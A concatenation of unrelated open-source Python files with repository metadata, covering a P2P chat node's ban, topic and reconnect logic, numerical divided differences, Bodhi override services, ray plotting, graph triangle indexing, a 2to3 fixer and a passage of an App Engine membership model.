if self.isBanned(int_ip):
osm.nodeExited(n, "Node Banned")
# Check my ping neighbors.
for pn in osm.pgm.pnbs.values(): # can't use itervalues
int_ip = Ad().setRawIPPort(pn.ipp).getIntIP()
if self.isBanned(int_ip):
osm.pgm.instaKillNeighbor(pn)
# Check myself
if not osm.bsm:
int_ip = Ad().setRawIPPort(osm.me.ipp).getIntIP()
if self.isBanned(int_ip):
self.main.showLoginStatus("You were banned.")
self.main.shutdown(reconnect='max')
def shutdown(self):
dcall_discard(self, 'rebuild_bans_dcall')
##############################################################################
class TopicManager(object):
def __init__(self, main):
self.main = main
self.topic = ""
self.topic_whoset = ""
self.topic_node = None
self.waiting = True
def gotTopic(self, n, topic):
self.updateTopic(n, n.nick, topic, changed=True)
def receivedSyncTopic(self, n, topic):
# Topic arrived from a YR packet
if self.waiting:
self.updateTopic(n, n.nick, topic, changed=False)
def updateTopic(self, n, nick, topic, changed):
# Don't want any more SyncTopics
self.waiting = False
# Don't allow a non-bridge node to override a bridge's topic
if self.topic_node and n:
if self.topic_node.bridge_data and (not n.bridge_data):
return False
# Sanitize the topic
topic = topic[:255].replace('\r','').replace('\n','')
# Get old topic
old_topic = self.topic
# Store stuff
self.topic = topic
self.topic_whoset = nick
self.topic_node = n
# Without DC, there's nothing to say
dch = self.main.getOnlineDCH()
if not dch:
return True
# If it's changed, push it to the title bar
if topic != old_topic:
dch.pushTopic(topic)
# If a change was reported, tell the user that it changed.
if changed and nick:
dch.pushStatus("%s changed the topic to: %s" % (nick, topic))
# If a change wasn't reported, but it's new to us, and it's not
# empty, then just say what the topic is.
if not changed and topic and topic != old_topic:
dch.pushStatus(self.getFormattedTopic())
return True
def broadcastNewTopic(self, topic):
osm = self.main.osm
if len(topic) > 255:
topic = topic[:255]
# Update topic locally
if not self.updateTopic(osm.me, osm.me.nick, topic, changed=True):
# Topic is controlled by a bridge node
self.topic_node.bridge_data.sendTopicChange(topic)
return
packet = osm.mrm.broadcastHeader('TP', osm.me.ipp)
packet.append(struct.pack('!I', osm.mrm.getPacketNumber_search()))
packet.append(osm.me.nickHash())
packet.append(struct.pack('!B', len(topic)))
packet.append(topic)
osm.mrm.newMessage(''.join(packet), tries=4)
def getFormattedTopic(self):
if not self.topic:
return "There is currently no topic set."
text = "The topic is: %s" % self.topic
if self.topic_node and self.topic_node.nick:
whoset = self.topic_node.nick
else:
whoset = self.topic_whoset
if whoset:
text += " (set by %s)" % whoset
return text
def checkLeavingNode(self, n):
# If the node who set the topic leaves, wipe out the topic
if self.topic_node is n:
self.updateTopic(None, "", "", changed=False)
##############################################################################
class DtellaMain_Base(object):
def __init__(self):
self.myip_reports = []
self.reconnect_dcall = None
self.reconnect_interval = RECONNECT_RANGE[0]
# Initial Connection Manager
self.icm = None
# Neighbor Connection Manager
self.osm = None
self.accept_IQ_trigger = False
# Packet Encoder
self.pk_enc = dtella.common.crypto.PacketEncoder(local.network_key)
# Register a function that runs before shutting down
reactor.addSystemEventTrigger('before', 'shutdown',
self.cleanupOnExit)
# Set to True to prevent this node from broadcasting.
self.hide_node = False
def cleanupOnExit(self):
raise NotImplementedError("Override me!")
def reconnectDesired(self):
raise NotImplementedError("Override me!")
def startConnecting(self):
raise NotImplementedError("Override me!")
def startInitialContact(self):
# If all the conditions are right, start connection procedure
CHECK(not (self.icm or self.osm))
dcall_discard(self, 'reconnect_dcall')
def cb(result):
self.icm = None
result, node_ipps = result
if result == 'good':
self.startNodeSync(node_ipps)
elif result == 'banned_ip':
self.showLoginStatus(
"Your IP seems to be banned from this network.")
self.shutdown(reconnect='max')
elif result == 'foreign_ip':
try:
my_ip = self.selectMyIP(allow_bad=True).getTextIP()
except ValueError:
my_ip = "?"
self.showLoginStatus(
"Your IP address (%s) is not authorized to use "
"this network." % my_ip)
self.shutdown(reconnect='max')
elif result == 'dead_port':
self.needPortForward()
elif result == 'no_nodes':
self.showLoginStatus(
"No online nodes found.")
self.shutdown(reconnect='normal')
# If we receive an IQ packet after finding no nodes, then
# assume we're a root node and form an empty network
if not self.hide_node:
self.accept_IQ_trigger = True
else:
# Impossible result
CHECK(False)
self.ph.remap_ip = None
self.icm = InitialContactManager(self)
self.icm.start().addCallback(cb)
def needPortForward(self):
self.showLoginStatus(
"*** UDP PORT FORWARD REQUIRED ***")
text = (
"In order for Dtella to communicate properly, it needs to "
"receive UDP traffic from the Internet. Dtella is currently "
"listening on UDP port %d, but the packets appear to be "
"getting blocked, most likely by a firewall or a router. "
"If this is the case, then you will have to configure your "
"firewall or router to allow UDP traffic through on this "
"port. You may tell Dtella to use a different port from "
"now on by typing !UDP followed by a number."
" "
"Note: You will also need to unblock or forward a TCP port "
"for your DC++ client to be able to transfer files."
% self.state.udp_port
)
for line in word_wrap(text):
self.showLoginStatus(line)
self.shutdown(reconnect='max')
def startNodeSync(self, node_ipps):
# Determine my IP address and enable the osm
CHECK(not (self.icm or self.osm))
# Reset the reconnect interval
self.reconnect_interval = RECONNECT_RANGE[0]
dcall_discard(self, 'reconnect_dcall')
# Get my address and port
try:
my_ipp = self.selectMyIP().getRawIPPort()
except ValueError:
self.showLoginStatus("Can't determine my own IP?!")
return
# Look up my location string
if local.use_locations:
self.queryLocation(my_ipp)
# Get Bridge Client/Server Manager, or nothing.
b = self.getBridgeManager()
# Enable the object that keeps us online
self.osm = OnlineStateManager(self, my_ipp, node_ipps, **b)
def getBridgeManager(self):
raise NotImplementedError("Override me!")
def queryLocation(self, my_ipp):
raise NotImplementedError("Override me!")
def logPacket(self, text):
raise NotImplementedError("Override me!")
def showLoginStatus(self, text, counter=None):
raise NotImplementedError("Override me!")
def shutdown(self, reconnect):
# Do a total shutdown of this Dtella node
# It's possible for these both to be None, but we still
# want to reconnect. (i.e. after an ICM failure)
if (self.icm or self.osm):
self.showLoginStatus("Shutting down.")
dcall_discard(self, 'reconnect_dcall')
self.accept_IQ_trigger = False
# Shut down InitialContactManager
if self.icm:
self.icm.shutdown()
self.icm = None
# Shut down OnlineStateManager
if self.osm:
# Notify any observers that all the nicks are gone.
if self.osm.syncd:
self.stateChange_DtellaDown()
self.osm.shutdown()
self.osm = None
# Notify some random handlers of the shutdown
self.afterShutdownHandlers()
# Schedule a Reconnect (maybe) ...
# Check if a reconnect makes sense right now
if not self.reconnectDesired():
return
if reconnect == 'no':
return
elif reconnect == 'max':
self.reconnect_interval = RECONNECT_RANGE[1]
else:
CHECK(reconnect in ('normal', 'instant'))
if reconnect == 'instant':
# Just do an instant reconnect without saying anything.
when = 0
self.reconnect_interval = RECONNECT_RANGE[0]
else:
# Decide how long to wait before reconnecting
when = self.reconnect_interval * random.uniform(0.8, 1.2)
                # Increase the reconnect interval exponentially (x1.5, capped)
self.reconnect_interval = min(self.reconnect_interval * 1.5,
RECONNECT_RANGE[1])
self.showLoginStatus("--")
self.showLoginStatus(
"Next reconnect attempt in %d seconds." % when)
def cb():
self.reconnect_dcall = None
self.startConnecting()
self.reconnect_dcall = reactor.callLater(when, cb)
def afterShutdownHandlers(self):
raise NotImplementedError("Override me!")
def getOnlineDCH(self):
raise NotImplementedError("Override me!")
def getStateObserver(self):
raise NotImplementedError("Override me!")
def kickObserver(self, lines, rejoin_time):
so = self.getStateObserver()
CHECK(so)
# Act as if Dtella is shutting down.
self.stateChange_DtellaDown()
# Force the observer to go invisible, with a kick message.
so.event_KickMe(lines, rejoin_time)
# Send empty state to Dtella.
self.stateChange_ObserverDown()
def stateChange_ObserverUp(self):
# Called after a DC client / IRC server / etc. has become available.
osm = self.osm
if osm and osm.syncd:
self.osm.updateMyInfo()
            # Make sure the observer's still online, because a nick collision
            # in updateMyInfo could have killed it.
so = self.getStateObserver()
if so:
so.event_DtellaUp()
def stateChange_ObserverDown(self):
# Called after a DC client / IRC server / etc. has gone away.
CHECK(not self.getStateObserver())
osm = self.osm
if osm and osm.syncd:
osm.updateMyInfo()
# Cancel all nick-specific messages.
for n in osm.nodes:
n.nickRemoved(self)
def stateChange_DtellaUp(self):
# Called after Dtella has finished syncing.
osm = self.osm
CHECK(osm and osm.syncd)
osm.updateMyInfo(send=True)
so = self.getStateObserver()
if so:
so.event_DtellaUp()
def stateChange_DtellaDown(self):
# Called before Dtella network shuts down.
so = self.getStateObserver()
if so:
# Remove every nick.
for n in self.osm.nkm.nickmap.itervalues():
so.event_RemoveNick(n, "Removing All Nicks")
so.event_DtellaDown()
def addMyIPReport(self, from_ad, my_ad):
# from_ad = the IP who sent us this guess
# my_ad = the IP that seems to belong to us
CHECK(from_ad.auth('sx', self))
fromip = from_ad.getRawIP()
myip = my_ad.getRawIP()
# If we already have a report from this fromip in the list, remove it.
try:
i = [r[0] for r in self.myip_reports].index(fromip)
del self.myip_reports[i]
except ValueError:
pass
# Only let list grow to 5 entries
del self.myip_reports[:-4]
# Append this guess to the end
self.myip_reports.append((fromip, myip))
def selectMyIP(self, allow_bad=False):
# Out of the last 5 responses, pick the IP that occurs most often.
# In case of a tie, pick the more recent one.
# Map from ip -> list of indexes
ip_hits = {}
for i, (reporter, ip) in enumerate(self.myip_reports):
try:
ip_hits[ip].append(i)
except KeyError:
ip_hits[ip] = [i]
# Sort by (hit count, highest index) descending.
scores = [(len(hits), hits[-1], ip)
for ip, hits in ip_hits.iteritems()]
scores.sort(reverse=True)
for hit_count, highest_index, ip in scores:
ad = Ad().setRawIP(ip)
ad.port = self.state.udp_port
if allow_bad or ad.auth('sx', self):
return ad
raise ValueError
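# Hedged illustration (not part of dtella): the voting scheme above, reduced
# to plain data. 'reports' mimics self.myip_reports as (reporter, guessed_ip)
# pairs; the most frequent guess wins, and ties go to the most recent report.
def _sketch_select_ip(reports):
    ip_hits = {}
    for i, (_reporter, ip) in enumerate(reports):
        ip_hits.setdefault(ip, []).append(i)
    scores = [(len(hits), hits[-1], ip) for ip, hits in ip_hits.items()]
    scores.sort(reverse=True)
    return scores[0][2] if scores else None
# e.g. _sketch_select_ip([('a', 'X'), ('b', 'Y'), ('c', 'Y'), ('d', 'X')])
# returns 'X': both IPs have two votes, but 'X' was reported more recently.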
|
pmarks-net/dtella
|
dtella/common/core.py
|
Python
|
gpl-2.0
| 131,965
|
def p5a():
xs = [-.75, -0.5,-0.25,0]
fxs = [-.0718125, -.02475, .3349375, 1.101]
getdd123(xs,fxs,3)
def getdd123(xs,fxs,n):
    # Newton divided differences (first, second and third order)
l1stdd = []
l2nddd = []
l3rddd = []
for i in range(0,n):
l1stdd.append((fxs[i+1]-fxs[i])/(xs[i+1]-xs[i]))
for i in range(0,n-1):
l2nddd.append((l1stdd[i+1]-l1stdd[i])/(xs[i+2]-xs[i]))
for i in range(0,n-2):
l3rddd.append((l2nddd[i+1]-l2nddd[i])/(xs[i+3]-xs[i]))
#print [l1stdd,l2nddd,l3rddd]
return [l1stdd,l2nddd,l3rddd]
def p7a():
xs = [-.1, 0,.2,.3]
fxs = [5.3, 2, 3.19, 1]
getdd123(xs,fxs,3)
def p14():
xs = [0, .25,.5,.75]
fxs = [1, 2, 3.5, 6]
getdd123(xs,fxs,3)
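# Hedged illustration (not in the original assignment): the first entry of
# each list returned by getdd123, together with fxs[0], forms the Newton-form
# coefficients, so the interpolating polynomial can be evaluated directly.
def newton_eval(xs, fxs, x):
    dd = getdd123(xs, fxs, len(xs) - 1)
    coeffs = [fxs[0]] + [col[0] for col in dd]
    result, basis = 0.0, 1.0
    for i, c in enumerate(coeffs):
        result += c * basis
        if i < len(xs) - 1:
            basis *= (x - xs[i])
    return result
# Sanity check: the polynomial reproduces the data points (up to rounding),
# e.g. newton_eval([-.75, -.5, -.25, 0], [-.0718125, -.02475, .3349375, 1.101], 0)
# gives 1.101.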
|
ilcn/NumericalAnalysis
|
a3.py
|
Python
|
gpl-2.0
| 659
|
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import math
from cornice import Service
from pyramid.exceptions import HTTPNotFound
from sqlalchemy import func, distinct
from sqlalchemy.sql import or_
from bodhi import log
from bodhi.models import Build, BuildrootOverride, Package, Release, User
import bodhi.schemas
import bodhi.services.errors
import bodhi.security
from bodhi.validators import (
validate_override_builds,
validate_expiration_date,
validate_packages,
validate_releases,
validate_username,
)
override = Service(name='override', path='/overrides/{nvr}',
description='Buildroot Overrides',
cors_origins=bodhi.security.cors_origins_ro)
overrides = Service(name='overrides', path='/overrides/',
description='Buildroot Overrides',
                    # Note: this 'rw' is not a typo; this service has a
                    # ``post`` section at the bottom.
cors_origins=bodhi.security.cors_origins_rw)
@override.get(accept=("application/json", "text/json"), renderer="json",
error_handler=bodhi.services.errors.json_handler)
@override.get(accept=("application/javascript"), renderer="jsonp",
error_handler=bodhi.services.errors.jsonp_handler)
@override.get(accept=("text/html"), renderer="override.html",
error_handler=bodhi.services.errors.html_handler)
def get_override(request):
db = request.db
nvr = request.matchdict.get('nvr')
build = Build.get(nvr, db)
if not build:
request.errors.add('url', 'nvr', 'No such build')
request.errors.status = HTTPNotFound.code
return
if not build.override:
request.errors.add('url', 'nvr',
'No buildroot override for this build')
request.errors.status = HTTPNotFound.code
return
return dict(override=build.override)
@overrides.get(schema=bodhi.schemas.ListOverrideSchema,
accept=("application/json", "text/json"), renderer="json",
error_handler=bodhi.services.errors.json_handler,
validators=(validate_packages, validate_releases,
validate_username)
)
@overrides.get(schema=bodhi.schemas.ListOverrideSchema,
accept=("application/javascript"), renderer="jsonp",
error_handler=bodhi.services.errors.jsonp_handler,
validators=(validate_packages, validate_releases,
validate_username)
)
@overrides.get(schema=bodhi.schemas.ListOverrideSchema,
accept=('application/atom+xml'), renderer='rss',
error_handler=bodhi.services.errors.html_handler,
validators=(validate_packages, validate_releases,
validate_username)
)
@overrides.get(schema=bodhi.schemas.ListOverrideSchema,
accept=('text/html'), renderer='overrides.html',
error_handler=bodhi.services.errors.html_handler,
validators=(validate_packages, validate_releases,
validate_username)
)
def query_overrides(request):
db = request.db
data = request.validated
query = db.query(BuildrootOverride)
expired = data.get('expired')
if expired is not None:
if expired:
query = query.filter(BuildrootOverride.expired_date!=None)
else:
query = query.filter(BuildrootOverride.expired_date==None)
packages = data.get('packages')
if packages is not None:
query = query.join(BuildrootOverride.build).join(Build.package)
query = query.filter(or_(*[Package.name==pkg.name for pkg in packages]))
releases = data.get('releases')
if releases is not None:
query = query.join(BuildrootOverride.build).join(Build.release)
query = query.filter(or_(*[Release.name==r.name for r in releases]))
like = data.get('like')
if like is not None:
query = query.join(BuildrootOverride.build)
query = query.filter(or_(*[
Build.nvr.like('%%%s%%' % like)
]))
submitter = data.get('user')
if submitter is not None:
query = query.filter(BuildrootOverride.submitter==submitter)
query = query.order_by(BuildrootOverride.submission_date.desc())
# We can't use ``query.count()`` here because it is naive with respect to
# all the joins that we're doing above.
count_query = query.with_labels().statement\
.with_only_columns([func.count(distinct(BuildrootOverride.id))])\
.order_by(None)
total = db.execute(count_query).scalar()
page = data.get('page')
rows_per_page = data.get('rows_per_page')
pages = int(math.ceil(total / float(rows_per_page)))
query = query.offset(rows_per_page * (page - 1)).limit(rows_per_page)
return dict(
overrides=query.all(),
page=page,
pages=pages,
rows_per_page=rows_per_page,
total=total,
chrome=data.get('chrome'),
display_user=data.get('display_user'),
)
@overrides.post(schema=bodhi.schemas.SaveOverrideSchema,
acl=bodhi.security.packagers_allowed_acl,
accept=("application/json", "text/json"), renderer='json',
error_handler=bodhi.services.errors.json_handler,
validators=(
validate_override_builds,
validate_expiration_date,
))
@overrides.post(schema=bodhi.schemas.SaveOverrideSchema,
acl=bodhi.security.packagers_allowed_acl,
accept=("application/javascript"), renderer="jsonp",
error_handler=bodhi.services.errors.jsonp_handler,
validators=(
validate_override_builds,
validate_expiration_date,
))
def save_override(request):
"""Save a buildroot override
This entails either creating a new buildroot override, or editing an
existing one. To edit an existing buildroot override, the buildroot
override's original id needs to be specified in the ``edited`` parameter.
"""
data = request.validated
edited = data.pop("edited")
caveats = []
try:
submitter = User.get(request.user.name, request.db)
if edited is None:
builds = data['builds']
overrides = []
if len(builds) > 1:
caveats.append({
'name': 'nvrs',
'description': 'Your override submission was '
'split into %i.' % len(builds)
})
for build in builds:
log.info("Creating a new buildroot override: %s" % build.nvr)
overrides.append(BuildrootOverride.new(
request,
build=build,
submitter=submitter,
notes=data['notes'],
expiration_date=data['expiration_date'],
))
if len(builds) > 1:
result = dict(overrides=overrides)
else:
result = overrides[0]
else:
log.info("Editing buildroot override: %s" % edited)
edited = Build.get(edited, request.db)
if edited is None:
request.errors.add('body', 'edited', 'No such build')
return
result = BuildrootOverride.edit(
request, edited=edited, submitter=submitter,
notes=data["notes"], expired=data["expired"],
expiration_date=data["expiration_date"]
)
if not result:
# Some error inside .edit(...)
return
except Exception as e:
log.exception(e)
request.errors.add('body', 'override',
'Unable to save buildroot override: %s' % e)
return
if not isinstance(result, dict):
result = result.__json__()
result['caveats'] = caveats
return result
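# Hedged aside (not part of bodhi): query.count() would double-count rows
# fanned out by the joins in query_overrides(), hence the distinct-id count
# above. The page arithmetic itself is plain ceiling division:
def _page_count(total, rows_per_page):
    return int(math.ceil(total / float(rows_per_page)))
# e.g. _page_count(0, 20) == 0, _page_count(20, 20) == 1, _page_count(21, 20) == 2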
|
Akasurde/bodhi
|
bodhi/services/overrides.py
|
Python
|
gpl-2.0
| 8,799
|
import os
import numpy as np
from matplotlib import pyplot as plt
from numpy import genfromtxt
from matplotlib import cm
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
def axisEqual3D(ax):
extents = np.array([getattr(ax, 'get_{}lim'.format(dim))() for dim in 'xyz'])
sz = extents[:, 1] - extents[:, 0]
centers = np.mean(extents, axis=1)
maxsize = max(abs(sz))
r = maxsize/2
for ctr, dim in zip(centers, 'xyz'):
getattr(ax, 'set_{}lim'.format(dim))(ctr - r, ctr + r)
def drawRay(ax, filePath):
# Retrieve ray points
sphericalPoints = genfromtxt(filePath, delimiter=',')
# Retrieve the actual data
r = sphericalPoints[:, 3]
theta = sphericalPoints[:, 4]
phi = sphericalPoints[:, 5]
cosT = np.cos(theta)
sinT = np.sin(theta)
cosP = np.cos(phi)
sinP = np.sin(phi)
x = r * sinT * cosP
y = r * sinT * sinP
z = r * cosT
ax.plot(x, y, z, label='Ray0')
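# Hedged check (not in the original script): the spherical -> Cartesian
# conversion above preserves the radius, i.e. sqrt(x^2 + y^2 + z^2) == |r|.
def _check_spherical(r, theta, phi):
    x = r * np.sin(theta) * np.cos(phi)
    y = r * np.sin(theta) * np.sin(phi)
    z = r * np.cos(theta)
    assert np.allclose(np.sqrt(x ** 2 + y ** 2 + z ** 2), np.abs(r))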
def drawRays(ax, filePath):
# Retrieve ray points
data = genfromtxt(filePath, delimiter=',')
for i in range(0, 100, 10):
ray = data[data[:, 0] == i, :]
ray = ray[ray[:, 2].argsort()[::-1]]
print(ray)
r = ray[:, 3]
theta = ray[:, 4]
phi = ray[:, 5]
cosT = np.cos(theta)
sinT = np.sin(theta)
cosP = np.cos(phi)
sinP = np.sin(phi)
        # Standard spherical -> Cartesian conversion, matching drawRay above
        x = r * sinT * cosP
        y = r * sinT * sinP
        z = r * cosT
ax.plot(x, y, z, label='Ray0', c='blue')
def drawCamera(ax):
camR = 100
camTheta = np.pi/2
camPhi = 0
camX = camR * np.sin(camTheta) * np.cos(camPhi)
camY = camR * np.sin(camTheta) * np.sin(camPhi)
camZ = camR * np.cos(camTheta)
ax.scatter(camX, camY, camZ, s=100, c='red')
x = [1, 1, -1, -1]
y = [1, -1, -1, 1]
z = [-1, -1, -1, -1]
verts = [(x[i], y[i], z[i]) for i in range(4)]
# ax.add_collection3d(Poly3DCollection(verts))
def drawAxes(ax, d=150):
ax.plot((-d, d), (0, 0), (0, 0), 'grey')
ax.plot((0, 0), (-d, d), (0, 0), 'grey')
    ax.plot((0, 0), (0, 0), (-d, d), 'grey')
def drawBlackHole(ax, r=5):
# Draw black hole
u = np.linspace(0, 2 * np.pi, 100)
v = np.linspace(0, np.pi, 100)
x = r * np.outer(np.cos(u), np.sin(v))
y = r * np.outer(np.sin(u), np.sin(v))
z = r * np.outer(np.ones(np.size(u)), np.cos(v))
ax.plot_surface(x, y, z, rstride=4, cstride=4, color='black')
def absoluteFilePaths(directory):
for dirpath, _, filenames in os.walk(directory):
for f in filenames:
yield os.path.abspath(os.path.join(dirpath, f))
if __name__ == '__main__':
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.set_axis_off()
ax.set_xlim3d(-25, 25)
ax.set_ylim3d(-25, 25)
ax.set_zlim3d(-25, 25)
# axisEqual3D(ax)
drawAxes(ax)
drawBlackHole(ax)
drawCamera(ax)
# drawRay(ax, "Data/rayPositions.csv")
# drawRay(ax, "Data/middleRay.csv")
# drawRays(ax, "Data/rays.csv")
# for fileName in absoluteFilePaths("Data/Spin00001"):
# if fileName.endswith(".csv"):
# drawRay(ax, fileName)
#
drawRay(ax, "Data/Spin00001/ray00.csv")
drawRay(ax, "Data/Spin00001/ray10.csv")
drawRay(ax, "Data/Spin00001/ray20.csv")
# drawRay(ax, "Data/Spin00001/ray30.csv")
drawRay(ax, "Data/Spin00001/ray40.csv")
drawRay(ax, "Data/Spin00001/ray50.csv")
drawRay(ax, "Data/Spin00001/ray60.csv")
# drawRay(ax, "Data/Spin00001/ray70.csv")
drawRay(ax, "Data/Spin00001/ray80.csv")
drawRay(ax, "Data/Spin00001/ray90.csv")
drawRay(ax, "Data/Spin00001/ray99.csv")
# ax.legend()
plt.show()
|
agarciamontoro/TFG
|
Software/Stuff/test_ray.py
|
Python
|
gpl-2.0
| 3,739
|
__author__ = 'Dongwoo Kim'
import itertools
from collections import defaultdict
import numpy as np
def num_neighbor(T, idx, link_val=1):
    """
    count the number of in- and out-links of the given node idx
    """
    outlink = len(np.nonzero(T[idx, :, :] == link_val)[0])
    inlink = len(np.nonzero(T[:, idx, :] == link_val)[0])
    return outlink + inlink
def sample_broken_tri(T, link_val=1):
"""
    find three nodes which do not form a triangular path (i->j->k<-i) and the corresponding relations a, b, c
    @param T: graph tensor matrix
    @return: tuple (a, b, c) where a, b, c are the indices of links (i->j), (j->k), (i->k)
    """
find = False
while not find:
i, j, k = np.random.permutation(range(T.shape[0]))[:3]
a, b, c = np.random.randint(T.shape[2], size=3)
if not (T[i, j, a] == link_val and T[j, k, b] == link_val and T[i, k, c] == link_val):
find = True
return ((i, j, a), (j, k, b), (i, k, c))
def tri_index(T, link_val=1):
"""
extract indices of every possible triangular path in the graph
especially for the following path structure
i -> j
j -> k
i -> k
@param T: [E x E x K] tensor graph where T[i,j,k] = 1 when there is type k link between node i and j
    @return: list of tuples (a, b, c) where a, b, c are the indices of links (i->j), (j->k), (i->k)
"""
T = T.copy()
T[T!=link_val] = 0
e, k = T.shape[0], T.shape[2]
T_squeeze = np.sum(T, 2)
indices = list()
link_types = defaultdict(list)
for i, j in itertools.permutations(range(e), 2):
        _tmp = np.nonzero(T[i, j, :])[0]
        if len(_tmp) != 0:
            link_types[(i, j)] = _tmp
for i in range(e):
out_links = np.setdiff1d(np.nonzero(T_squeeze[i, :])[0], i)
for j, k in itertools.permutations(out_links, 2):
if T_squeeze[j, k] != 0: # at least one edge from j to k exists
type_1, type_2, type_3 = link_types[(i, j)], link_types[(j, k)], link_types[(i, k)]
for types in itertools.product(type_1, type_2, type_3):
a = (i, j, types[0])
b = (j, k, types[1])
c = (i, k, types[2])
indices.append((a, b, c))
return indices
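# Hedged toy example (not in the original module): a 3-node, single-relation
# graph with links 0->1, 1->2 and 0->2 contains exactly one triangular path.
def _toy_tri_index():
    T = np.zeros((3, 3, 1))
    T[0, 1, 0] = T[1, 2, 0] = T[0, 2, 0] = 1
    assert tri_index(T) == [((0, 1, 0), (1, 2, 0), (0, 2, 0))]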
def test():
from scipy.io.matlab import loadmat
mat = loadmat('../data/alyawarradata.mat')
T = np.array(mat['Rs'], np.float32)
indices = tri_index(T)
print(len(indices))
for ix in range(10):
a, b, c = indices[ix]
i, j, t1 = a
j, k, t2 = b
i, k, t3 = c
print('a path %d->%d->%d by type %d/%d and a link %d->%d by type %d' % (i, j, k, t1, t2, i, k, t3))
    for ix in range(len(indices)):
        (i, j, t1), (j, k, t2), (i, k, t3) = indices[ix]
        assert T[i, j, t1] and T[j, k, t2] and T[i, k, t3]
if __name__ == '__main__':
test()
|
chubbymaggie/almc
|
amdc/path_tool.py
|
Python
|
gpl-2.0
| 2,836
|
'''
run with: python ten2eleven.py -f agmethods2 test_dummy_old_MDA_code.py
Author: Tyler Reddy
'''
from lib2to3.fixer_base import BaseFix
from lib2to3.fixer_util import Name, Call, LParen, RParen, ArgList, Dot
from lib2to3 import pytree
class FixAgmethods2(BaseFix):
PATTERN = """
    power< head=any+
trailer< dot = '.' method=('bond'|'angle'|'torsion'|
'improper')>
parens=trailer< '(' ')' >
tail=any*>
"""
def transform(self, node, results):
head = results['head']
method = results['method'][0]
tail = results['tail']
syms = self.syms
method_name = method.value
if method_name == 'torsion':
method_name = 'dihedral'
head = [n.clone() for n in head]
tail = [n.clone() for n in tail]
args = head + [pytree.Node(syms.trailer, [Dot(), Name(method_name, prefix = method.prefix), Dot(), Name('value'), LParen(), RParen()])]
new = pytree.Node(syms.power, args)
return new
|
alejob/mdanalysis
|
package/MDAnalysis/migration/fixes/fix_agmethods2.py
|
Python
|
gpl-2.0
| 1,114
|
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------
# Portello membership system
# Copyright (C) 2014 Klubb Alfa Romeo Norge
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# -------------------------------------------------------------------------
"""Data model for app."""
from google.appengine.ext import db
from google.appengine.api import search
from google.appengine.api import memcache
import datetime
YEAR_MAX = 25
class Country(db.Model):
"""Country. Just to make things simple."""
# Sorting order.
order = db.IntegerProperty(default=1)
# Local name.
name = db.StringProperty()
# Name of country when sending snail-mail
local_name = db.StringProperty()
class Status(db.Model):
"""Member state. Not to be confused with member *type*."""
order = db.IntegerProperty(default=1)
name = db.StringProperty()
class MemberType(db.Model):
"""Types of member."""
order = db.IntegerProperty(default=1)
name = db.StringProperty()
fee = db.IntegerProperty()
active = db.BooleanProperty(default=True)
class SearchMember():
""" A pseudo-member generated from the search results. Not used as proper
members """
pass
class Member(db.Model):
"""A member"""
number = db.StringProperty(indexed=True)
address = db.StringProperty()
email = db.EmailProperty(required=False)
name = db.StringProperty()
county = db.StringProperty()
member_since = db.DateProperty(required=False)
country = db.ReferenceProperty(Country, collection_name='members')
membertype = db.ReferenceProperty(MemberType, collection_name='members')
status = db.ReferenceProperty(Status, collection_name='members')
phone = db.PhoneNumberProperty(required=False)
notes = db.TextProperty(required=False)
zipcode = db.StringProperty()
city = db.StringProperty()
phone_work = db.PhoneNumberProperty(required=False)
phone_home = db.PhoneNumberProperty(required=False)
user = db.UserProperty(required=False)
edit_access_code = db.StringProperty(required=False)
last_change = datetime.datetime.now()
magazine_count = db.IntegerProperty(required=False, default=1)
def put(self, **kwargs):
# update the last_change flag
self.last_change = datetime.datetime.now()
super(Member, self).put(**kwargs)
# Update search index with updated values after saving. Note that
# this is half-assed and puts via db.put() must be handled
# differently.
self.update_index()
@classmethod
def search_member_from_document(cls, document):
ret = SearchMember()
ret.key = document.doc_id
for field in document.fields:
if field.name == 'number':
ret.number = field.value
if field.name == 'name':
ret.name = field.value
if field.name == 'address':
ret.address = field.value
if field.name == 'country':
ret.country = field.value
if field.name == 'type':
ret.membertype = field.value
if field.name == 'email':
ret.email = field.value
if field.name == 'status':
ret.status = field.value
if field.name == 'phone':
ret.phone = field.value
if field.name == 'zip':
ret.zipcode = field.value
if field.name == 'city':
ret.city = field.value
return ret
def create_document(self):
""" Create document to enable full-text search """
if not self.membertype:
            print 'Missing member type for', repr(self.name), self.number
fieldlist = [
search.TextField(name='name', value=self.name),
search.TextField(name='address', value=self.address),
search.TextField(name='country', value=self.country.name),
search.TextField(name='county', value=self.county),
search.TextField(name='notes', value=self.notes),
search.TextField(name='status', value=self.status.name),
search.TextField(name='type', value=self.membertype.name),
search.TextField(name='number', value=self.number),
search.TextField(name='zip', value=self.zipcode),
search.TextField(name='city', value=self.city)
]
        if self.member_since:
            fieldlist.append(search.DateField(name='membersince',
                                              value=self.member_since))
if self.email:
fieldlist.append(search.TextField(name='email', \
value=self.email))
if self.phone:
fieldlist.append(search.TextField(name='phone', \
value=self.phone))
if self.phone_work:
fieldlist.append(search.TextField(name='phone_work', \
value=self.phone_work))
if self.phone_home:
fieldlist.append(search.TextField(name='phone_home', \
value=self.phone_home))
current_year = datetime.datetime.now().year
paid_dues = {}
for year in range(current_year-5, current_year+5):
paid_dues[year] = 0
dues = MembershipDues.all().ancestor(self).fetch(YEAR_MAX)
        for due in dues:
            if due.paid and due.year in paid_dues:
                paid_dues[due.year] = 1
for index_due in range(current_year-5, current_year+5):
